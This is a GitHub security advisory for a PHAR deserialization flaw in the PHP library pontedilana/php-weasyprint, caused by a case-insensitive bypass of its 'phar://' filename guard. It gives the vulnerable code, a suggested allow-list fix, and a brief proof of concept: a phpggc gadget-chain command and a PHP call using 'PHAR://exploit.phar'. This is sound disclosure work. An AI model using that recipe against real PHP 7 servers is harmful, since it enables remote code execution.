Skip to content

PhpWeasyPrint vulnerable to PHAR deserialization via output filename (CVE-2023-28115 case-insensitive bypass)

High severity GitHub Reviewed Published May 25, 2026 in pontedilana/php-weasyprint • Updated Jun 26, 2026

Package

composer pontedilana/php-weasyprint (Composer)

Affected versions

<= 2.5.1

Patched versions

2.6.0

Description

Summary

pontedilana/php-weasyprint guarded the output filename against the phar:// stream wrapper with a case-sensitive blacklist:

if (0 === \strpos($filename, 'phar://')) {
    throw new \InvalidArgumentException('The output file cannot be a phar archive.');
}

PHP stream wrappers are case-insensitive, so PHAR://, Phar://, etc. bypass the check and reach fileExists() (file_exists()) in prepareOutput(). On PHP 7 (which the library still supports — PHP 7.4+), this triggers deserialization of a crafted PHAR archive's metadata, leading to remote code execution. This is the patch-bypass of CVE-2023-28115.

The same issue and fix were handled upstream in KnpLabs/snappy (GHSA-92rv-4j2h-8mjj).

Affected versions

pontedilana/php-weasyprint versions <= 2.5.1 (the case-sensitive guard was introduced in commit eb8accc, "Implement countermeasures for CVE-2023-28115").

Patched in: 2.6.0.

Privilege required

A caller able to control the output filename passed to generate() / generateFromHtml(), plus the ability to place a PHAR archive on the filesystem (e.g. via an upload). Exploitation of the deserialization requires the server to run PHP < 8.

Vulnerable code

src/AbstractGenerator.php, prepareOutput():

if (0 === \strpos($filename, 'phar://')) {
    throw new \InvalidArgumentException('The output file cannot be a phar archive.');
}

strpos($filename, 'phar://') matches only the exact lowercase string, while the wrapper resolution is case-insensitive — PHAR://payload.phar is not caught.

Proof of concept

# Craft a PHAR with a fast-destruct gadget chain
phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar
<?php
use Pontedilana\PhpWeasyPrint\Pdf;

$pdf = new Pdf('/usr/local/bin/weasyprint');
// Case-altered wrapper bypasses the lowercase 'phar://' blacklist
$pdf->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar');
// On PHP < 8, the PHAR metadata is deserialized -> /tmp/exploit is created

Impact

  • Remote code execution and filesystem access through PHAR metadata deserialization on PHP < 8, when the output filename is attacker-influenced and a PHAR can be planted.

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H (8.1, High) — Critical in deployments running PHP 7 with an upload surface; adjust to your environment.

CWE-502 (Deserialization of Untrusted Data).

Suggested fix

Replace the case-sensitive blacklist with a scheme allow-list (file / no scheme), comparing the lowercased scheme parsed from the filename:

protected const ALLOWED_PROTOCOLS = ['file'];

protected function isProtocolAllowed(string $filename): bool
{
    if (false === $parsed = \parse_url($filename)) {
        throw new \InvalidArgumentException('The filename is not valid.');
    }
    $protocol = isset($parsed['scheme']) ? \strtolower($parsed['scheme']) : 'file';
    // ...special-case Windows drive letters (C:\...) as 'file'...
    return \in_array($protocol, self::ALLOWED_PROTOCOLS, true);
}

prepareOutput() then rejects any non-file scheme (phar, PHAR, php, http, ...) before file_exists() is reached.

Credit

Original vulnerability and patch-bypass reported upstream to KnpLabs/snappy by Rémi Matasse of Synacktiv (GHSA-92rv-4j2h-8mjj); identified as applicable to pontedilana/php-weasyprint, which mirrors the same code.

References

@endelwar endelwar published to pontedilana/php-weasyprint May 25, 2026
Published by the National Vulnerability Database Jun 19, 2026
Published to the GitHub Advisory Database Jun 26, 2026
Reviewed Jun 26, 2026
Last updated Jun 26, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(42nd percentile)

Weaknesses

Deserialization of Untrusted Data

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid. Learn more on MITRE.

CVE ID

CVE-2026-49286

GHSA ID

GHSA-2fmj-p74r-3wjm
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.